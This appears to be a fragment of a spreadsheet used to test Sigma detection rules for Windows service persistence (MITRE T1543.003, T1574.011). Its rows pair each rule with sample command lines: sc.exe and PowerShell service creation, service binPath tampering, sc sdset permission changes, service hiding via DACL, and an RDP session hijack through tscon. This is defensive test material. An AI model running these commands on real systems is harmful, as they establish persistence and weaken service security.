        <v>3</v>
      </c>
      <c r="K690" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="691" ht="15.75" customHeight="1" s="42">
      <c r="A691" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B691" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_create_service</t>
        </is>
      </c>
      <c r="C691" s="44" t="inlineStr">
        <is>
          <t>New Service Creation Using PowerShell</t>
        </is>
      </c>
      <c r="D691" s="44" t="inlineStr">
        <is>
          <t>c02e96b7-c63a-4c47-bd83-4a9f74afcfb2</t>
        </is>
      </c>
      <c r="E691" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "New-Service -Name 'TestService' -BinaryPathName 'cmd.exe' -StartupType Manual"</t>
        </is>
      </c>
      <c r="F691" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G691" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H691" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I691" s="44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691" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K691" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="692" ht="15.75" customHeight="1" s="42">
      <c r="A692" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B692" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_create_service</t>
        </is>
      </c>
      <c r="C692" s="44" t="inlineStr">
        <is>
          <t>New Service Creation Using PowerShell</t>
        </is>
      </c>
      <c r="D692" s="44" t="inlineStr">
        <is>
          <t>c02e96b7-c63a-4c47-bd83-4a9f74afcfb2</t>
        </is>
      </c>
      <c r="E692" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "New-Service -BinaryPathName 'cmd.exe' -Name 'TestService' -StartupType Manual"</t>
        </is>
      </c>
      <c r="F692" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G692" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H692" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I692" s="44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692" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K692" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="693" ht="15.75" customHeight="1" s="42">
      <c r="A693" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B693" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_create_service</t>
        </is>
      </c>
      <c r="C693" s="44" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE</t>
        </is>
      </c>
      <c r="D693" s="44" t="inlineStr">
        <is>
          <t>85ff530b-261d-48c6-a441-facaa2e81e48</t>
        </is>
      </c>
      <c r="E693" s="44" t="inlineStr">
        <is>
          <t>sc create W64Time binPath= "c:\Windows\System32\svchost.exe -k TimeService" type= share start=auto</t>
        </is>
      </c>
      <c r="F693" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G693" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H693" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I693" s="44" t="inlineStr">
        <is>
          <t>Suspicious New Service Creation (17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8); New Service Creation Using Sc.EXE (85ff530b-261d-48c6-a441-facaa2e81e48)</t>
        </is>
      </c>
      <c r="J693" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K693" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="694" ht="15.75" customHeight="1" s="42">
      <c r="A694" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B694" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_create_service</t>
        </is>
      </c>
      <c r="C694" s="44" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE</t>
        </is>
      </c>
      <c r="D694" s="44" t="inlineStr">
        <is>
          <t>85ff530b-261d-48c6-a441-facaa2e81e48</t>
        </is>
      </c>
      <c r="E694" s="44" t="inlineStr">
        <is>
          <t>sc.exe create AtomicTestService_CMD binPath= "C:\AtomicRedTeam\atomics\T1543.003\bin\AtomicService.exe" start=auto type=Own</t>
        </is>
      </c>
      <c r="F694" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G694" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H694" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I694" s="44" t="inlineStr">
        <is>
          <t>Suspicious New Service Creation (17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8); New Service Creation Using Sc.EXE (85ff530b-261d-48c6-a441-facaa2e81e48)</t>
        </is>
      </c>
      <c r="J694" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K694" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="695" ht="15.75" customHeight="1" s="42">
      <c r="A695" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B695" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_create_service</t>
        </is>
      </c>
      <c r="C695" s="44" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE</t>
        </is>
      </c>
      <c r="D695" s="44" t="inlineStr">
        <is>
          <t>85ff530b-261d-48c6-a441-facaa2e81e48</t>
        </is>
      </c>
      <c r="E695" s="44" t="inlineStr">
        <is>
          <t>sc.exe create sesshijack binpath= "cmd.exe /k tscon 1337 /dest:rdp-tcp#55"</t>
        </is>
      </c>
      <c r="F695" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G695" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H695" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I695" s="44" t="inlineStr">
        <is>
          <t>Suspicious New Service Creation (17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8); Suspicious RDP Redirect Using TSCON (f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb); Suspicious RDP Redirect Using TSCON (f72aa3e8-49f9-4c7d-bd74-f8ab84ff9bbb); New Service Creation Using Sc.EXE (85ff530b-261d-48c6-a441-facaa2e81e48)</t>
        </is>
      </c>
      <c r="J695" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K695" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="696" ht="15.75" customHeight="1" s="42">
      <c r="A696" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B696" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_create_service</t>
        </is>
      </c>
      <c r="C696" s="44" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE</t>
        </is>
      </c>
      <c r="D696" s="44" t="inlineStr">
        <is>
          <t>85ff530b-261d-48c6-a441-facaa2e81e48</t>
        </is>
      </c>
      <c r="E696" s="44" t="inlineStr">
        <is>
          <t>sc.exe create AtomicService binPath= "C:\Windows\System32\calc.exe"</t>
        </is>
      </c>
      <c r="F696" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G696" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H696" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I696" s="44" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE (85ff530b-261d-48c6-a441-facaa2e81e48)</t>
        </is>
      </c>
      <c r="J696" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K696" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="697" ht="15.75" customHeight="1" s="42">
      <c r="A697" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B697" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_create_service</t>
        </is>
      </c>
      <c r="C697" s="44" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE</t>
        </is>
      </c>
      <c r="D697" s="44" t="inlineStr">
        <is>
          <t>85ff530b-261d-48c6-a441-facaa2e81e48</t>
        </is>
      </c>
      <c r="E697" s="44" t="inlineStr">
        <is>
          <t>sc.exe create "WerFaultSvc" binPath= "$env:windir\WinSxS\x86_microsoft-windows-errorreportingfaults_31bf3856ad364e35_4.0.9600.16384_none_a13f7e283339a050\WerFault.exe" DisplayName= "WerFault Service" start= auto</t>
        </is>
      </c>
      <c r="F697" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G697" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H697" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I697" s="44" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE (85ff530b-261d-48c6-a441-facaa2e81e48)</t>
        </is>
      </c>
      <c r="J697" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K697" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="698" ht="15.75" customHeight="1" s="42">
      <c r="A698" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B698" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_create_service</t>
        </is>
      </c>
      <c r="C698" s="44" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE</t>
        </is>
      </c>
      <c r="D698" s="44" t="inlineStr">
        <is>
          <t>85ff530b-261d-48c6-a441-facaa2e81e48</t>
        </is>
      </c>
      <c r="E698" s="44" t="inlineStr">
        <is>
          <t>sc.exe create ARTService binPath= "C:\WINDOWS\system32\cmd.exe /c powershell.exe -nop -w hidden -command New-Item -ItemType File C:\art-marker.txt"</t>
        </is>
      </c>
      <c r="F698" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G698" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H698" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I698" s="44" t="inlineStr">
        <is>
          <t>Suspicious New Service Creation (17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8); New Service Creation Using Sc.EXE (85ff530b-261d-48c6-a441-facaa2e81e48)</t>
        </is>
      </c>
      <c r="J698" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K698" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="699" ht="15.75" customHeight="1" s="42">
      <c r="A699" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B699" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_create_service</t>
        </is>
      </c>
      <c r="C699" s="44" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE</t>
        </is>
      </c>
      <c r="D699" s="44" t="inlineStr">
        <is>
          <t>85ff530b-261d-48c6-a441-facaa2e81e48</t>
        </is>
      </c>
      <c r="E699" s="44" t="inlineStr">
        <is>
          <t>sc create MyService binpath= "calc.exe"</t>
        </is>
      </c>
      <c r="F699" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G699" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H699" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I699" s="44" t="inlineStr">
        <is>
          <t>New Service Creation Using Sc.EXE (85ff530b-261d-48c6-a441-facaa2e81e48)</t>
        </is>
      </c>
      <c r="J699" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K699" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="700" ht="15.75" customHeight="1" s="42">
      <c r="A700" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B700" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_allow_service_changes</t>
        </is>
      </c>
      <c r="C700" s="44" t="inlineStr">
        <is>
          <t>Allow Service Access Using Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D700" s="44" t="inlineStr">
        <is>
          <t>6c8fbee5-dee8-49bc-851d-c3142d02aa47</t>
        </is>
      </c>
      <c r="E700" s="44" t="inlineStr">
        <is>
          <t>sc sdset TargetService "D:(A;;CCLCSWRPWPDTLOCRRC;;;AU)"</t>
        </is>
      </c>
      <c r="F700" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G700" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H700" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I700" s="44" t="inlineStr">
        <is>
          <t>Service Security Descriptor Tampering Via Sc.EXE (98c5aeef-32d5-492f-b174-64a691896d25)</t>
        </is>
      </c>
      <c r="J700" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K700" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="701" ht="15.75" customHeight="1" s="42">
      <c r="A701" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B701" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_allow_service_changes</t>
        </is>
      </c>
      <c r="C701" s="44" t="inlineStr">
        <is>
          <t>Allow Service Access Using Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D701" s="44" t="inlineStr">
        <is>
          <t>6c8fbee5-dee8-49bc-851d-c3142d02aa47</t>
        </is>
      </c>
      <c r="E701" s="44" t="inlineStr">
        <is>
          <t>sc.exe sdset TargetService D:(A;;CCLCSWRPWPDTLOCRRC;;;AU)</t>
        </is>
      </c>
      <c r="F701" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G701" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H701" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I701" s="44" t="inlineStr">
        <is>
          <t>Service Security Descriptor Tampering Via Sc.EXE (98c5aeef-32d5-492f-b174-64a691896d25)</t>
        </is>
      </c>
      <c r="J701" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K701" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="702" ht="15.75" customHeight="1" s="42">
      <c r="A702" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B702" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_allow_service_changes</t>
        </is>
      </c>
      <c r="C702" s="44" t="inlineStr">
        <is>
          <t>Allow Service Access Using Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D702" s="44" t="inlineStr">
        <is>
          <t>6c8fbee5-dee8-49bc-851d-c3142d02aa47</t>
        </is>
      </c>
      <c r="E702" s="44" t="inlineStr">
        <is>
          <t>sc sdset TargetService D:(A;;GA;;;WD)</t>
        </is>
      </c>
      <c r="F702" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G702" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H702" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I702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02" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K702" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="703" ht="15.75" customHeight="1" s="42">
      <c r="A703" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B703" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_allow_service_changes</t>
        </is>
      </c>
      <c r="C703" s="44" t="inlineStr">
        <is>
          <t>Allow Service Access Using Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D703" s="44" t="inlineStr">
        <is>
          <t>6c8fbee5-dee8-49bc-851d-c3142d02aa47</t>
        </is>
      </c>
      <c r="E703" s="44" t="inlineStr">
        <is>
          <t>sc sdset TargetService D:(A;;CCLCSWRPWPDTLOCRRC;;;IU)</t>
        </is>
      </c>
      <c r="F703" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G703" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H703" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I703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03" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K703" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="704" ht="15.75" customHeight="1" s="42">
      <c r="A704" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B704" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_allow_service_changes</t>
        </is>
      </c>
      <c r="C704" s="44" t="inlineStr">
        <is>
          <t>Allow Service Access Using Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D704" s="44" t="inlineStr">
        <is>
          <t>6c8fbee5-dee8-49bc-851d-c3142d02aa47</t>
        </is>
      </c>
      <c r="E704" s="44" t="inlineStr">
        <is>
          <t>sc.exe sdset TargetService D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)</t>
        </is>
      </c>
      <c r="F704" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G704" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H704" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I704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04" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K704" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="705" ht="15.75" customHeight="1" s="42">
      <c r="A705" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B705" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_service_tamper_for_persistence</t>
        </is>
      </c>
      <c r="C705" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Attempt Via Existing Service Tampering</t>
        </is>
      </c>
      <c r="D705" s="44" t="inlineStr">
        <is>
          <t>38879043-7e1e-47a9-8d46-6bec88e201df</t>
        </is>
      </c>
      <c r="E705" s="44" t="inlineStr">
        <is>
          <t>sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe" -noexit -c "write-host 'T1543.003 Test'"</t>
        </is>
      </c>
      <c r="F705" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G705" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H705" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I705" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher (6c96fc76-0eb1-11eb-adc1-0242ac120002); Potential Persistence Attempt Via Existing Service Tampering (38879043-7e1e-47a9-8d46-6bec88e201df); Potential Persistence Attempt Via Existing Service Tampering (38879043-7e1e-47a9-8d46-6bec88e201df)</t>
        </is>
      </c>
      <c r="J705" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K705" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="706" ht="15.75" customHeight="1" s="42">
      <c r="A706" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B706" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_service_tamper_for_persistence</t>
        </is>
      </c>
      <c r="C706" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Attempt Via Existing Service Tampering</t>
        </is>
      </c>
      <c r="D706" s="44" t="inlineStr">
        <is>
          <t>38879043-7e1e-47a9-8d46-6bec88e201df</t>
        </is>
      </c>
      <c r="E706" s="44" t="inlineStr">
        <is>
          <t>sc config Fax binPath= C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c write-host 'T1543.003 Test'</t>
        </is>
      </c>
      <c r="F706" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G706" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H706" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I706" s="44" t="inlineStr">
        <is>
          <t>Invoke-Obfuscation STDIN+ Launcher (6c96fc76-0eb1-11eb-adc1-0242ac120002); Potential Persistence Attempt Via Existing Service Tampering (38879043-7e1e-47a9-8d46-6bec88e201df); Potential Persistence Attempt Via Existing Service Tampering (38879043-7e1e-47a9-8d46-6bec88e201df)</t>
        </is>
      </c>
      <c r="J706" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K706" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="707" ht="15.75" customHeight="1" s="42">
      <c r="A707" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B707" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_service_tamper_for_persistence</t>
        </is>
      </c>
      <c r="C707" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Attempt Via Existing Service Tampering</t>
        </is>
      </c>
      <c r="D707" s="44" t="inlineStr">
        <is>
          <t>38879043-7e1e-47a9-8d46-6bec88e201df</t>
        </is>
      </c>
      <c r="E707" s="44" t="inlineStr">
        <is>
          <t>sc config Fax binPath= C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -c write-host 'T1543.003 Test'</t>
        </is>
      </c>
      <c r="F707" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G707" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H707" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I707" s="44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J707" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K707" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="708" ht="15.75" customHeight="1" s="42">
      <c r="A708" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B708" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_service_tamper_for_persistence</t>
        </is>
      </c>
      <c r="C708" s="44" t="inlineStr">
        <is>
          <t>Potential Persistence Attempt Via Existing Service Tampering</t>
        </is>
      </c>
      <c r="D708" s="44" t="inlineStr">
        <is>
          <t>38879043-7e1e-47a9-8d46-6bec88e201df</t>
        </is>
      </c>
      <c r="E708" s="44" t="inlineStr">
        <is>
          <t>reg add HKLM\System\CurrentControlSet\Control\BootVerificationProgram /v ImagePath /t REG_SZ /d C:\Program\ Files\Internet\ Explorer\iexplore.exe</t>
        </is>
      </c>
      <c r="F708" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G708" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H708" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I708" s="44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J708" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K708" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="709" ht="15.75" customHeight="1" s="42">
      <c r="A709" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B709" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_service_creation</t>
        </is>
      </c>
      <c r="C709" s="44" t="inlineStr">
        <is>
          <t>Suspicious New Service Creation</t>
        </is>
      </c>
      <c r="D709" s="44" t="inlineStr">
        <is>
          <t>17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8</t>
        </is>
      </c>
      <c r="E709" s="44" t="inlineStr">
        <is>
          <t>sc create TestService binPath= "C:\\Windows\\System32\\cmd.exe /C echo BypassTest &gt; \\\\.\$$pipe\\TestPipe" type= own start= demand</t>
        </is>
      </c>
      <c r="F709" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G709" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H709" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I709" s="44" t="inlineStr">
        <is>
          <t>Suspicious New Service Creation (17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8); New Service Creation Using Sc.EXE (85ff530b-261d-48c6-a441-facaa2e81e48)</t>
        </is>
      </c>
      <c r="J709" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K709" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="710" ht="15.75" customHeight="1" s="42">
      <c r="A710" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B710" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_service_creation</t>
        </is>
      </c>
      <c r="C710" s="44" t="inlineStr">
        <is>
          <t>Suspicious New Service Creation</t>
        </is>
      </c>
      <c r="D710" s="44" t="inlineStr">
        <is>
          <t>17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8</t>
        </is>
      </c>
      <c r="E710" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "New-Service -Name TestService -BinaryPathName 'C:\\Windows\\System32\\notepad.exe' -StartupType Manual"</t>
        </is>
      </c>
      <c r="F710" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G710" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H710" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I710" s="44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710" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K710" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="711" ht="15.75" customHeight="1" s="42">
      <c r="A711" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B711" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_service_creation</t>
        </is>
      </c>
      <c r="C711" s="44" t="inlineStr">
        <is>
          <t>Suspicious New Service Creation</t>
        </is>
      </c>
      <c r="D711" s="44" t="inlineStr">
        <is>
          <t>17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8</t>
        </is>
      </c>
      <c r="E711" s="44" t="inlineStr">
        <is>
          <t>sc.exe create TestService binPath= "C:\\Windows\\System32\\svchost.exe -k NetworkService" type= share start= auto</t>
        </is>
      </c>
      <c r="F711" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G711" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H711" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I711" s="44" t="inlineStr">
        <is>
          <t>Suspicious New Service Creation (17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8); New Service Creation Using Sc.EXE (85ff530b-261d-48c6-a441-facaa2e81e48)</t>
        </is>
      </c>
      <c r="J711" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K711" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="712" ht="15.75" customHeight="1" s="42">
      <c r="A712" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B712" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_service_creation</t>
        </is>
      </c>
      <c r="C712" s="44" t="inlineStr">
        <is>
          <t>Suspicious New Service Creation</t>
        </is>
      </c>
      <c r="D712" s="44" t="inlineStr">
        <is>
          <t>17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8</t>
        </is>
      </c>
      <c r="E712" s="44" t="inlineStr">
        <is>
          <t>sc.exe create TestService binPath= "C:\\Windows\\System32\\cmd.exe /C echo Test &gt; C:\\Windows\\Temp\\test.txt" type= own start= auto</t>
        </is>
      </c>
      <c r="F712" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G712" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H712" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I712" s="44" t="inlineStr">
        <is>
          <t>Suspicious New Service Creation (17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8); New Service Creation Using Sc.EXE (85ff530b-261d-48c6-a441-facaa2e81e48)</t>
        </is>
      </c>
      <c r="J712" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K712" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="713" ht="15.75" customHeight="1" s="42">
      <c r="A713" s="44" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B713" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_service_creation</t>
        </is>
      </c>
      <c r="C713" s="44" t="inlineStr">
        <is>
          <t>Suspicious New Service Creation</t>
        </is>
      </c>
      <c r="D713" s="44" t="inlineStr">
        <is>
          <t>17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8</t>
        </is>
      </c>
      <c r="E713" s="44" t="inlineStr">
        <is>
          <t>powershell.exe -Command "New-Service -Name TestService -BinaryPathName 'C:\\Windows\\System32\\calc.exe' -StartupType Automatic"</t>
        </is>
      </c>
      <c r="F713" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G713" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H713" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I713" s="44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713" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K713" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="714" ht="15.75" customHeight="1" s="42">
      <c r="A714" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B714" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_hide_sevices</t>
        </is>
      </c>
      <c r="C714" s="44" t="inlineStr">
        <is>
          <t>Service DACL Abuse To Hide Services Via Sc.EXE</t>
        </is>
      </c>
      <c r="D714" s="44" t="inlineStr">
        <is>
          <t>a537cfc3-4297-4789-92b5-345bfd845ad0</t>
        </is>
      </c>
      <c r="E714" s="44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714" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G714" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H714" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I714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714" s="44" t="n">
        <v>3</v>
      </c>
      <c r="K714" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="715" ht="15.75" customHeight="1" s="42">
      <c r="A715" s="44" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B715" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_hide_sevices</t>
        </is>
      </c>
      <c r="C715" s="44" t="inlineStr">
        <is>
          <t>Service DACL Abuse To Hide Services Via Sc.EXE</t>
        </is>
      </c>
      <c r="D715" s="44" t="inlineStr">
        <is>
          <t>a537cfc3-4297-4789-92b5-345bfd845ad0</t>
        </is>
      </c>
      <c r="E715" s="44" t="inlineStr">
        <is>
          <t>sc.exe sdset "MyHiddenService" D:(D;;DCLCWPDTSD;;;IU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)</t>
        </is>
      </c>
      <c r="F715" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G715" s="44" t="b">
        <v>0</v>
      </c>
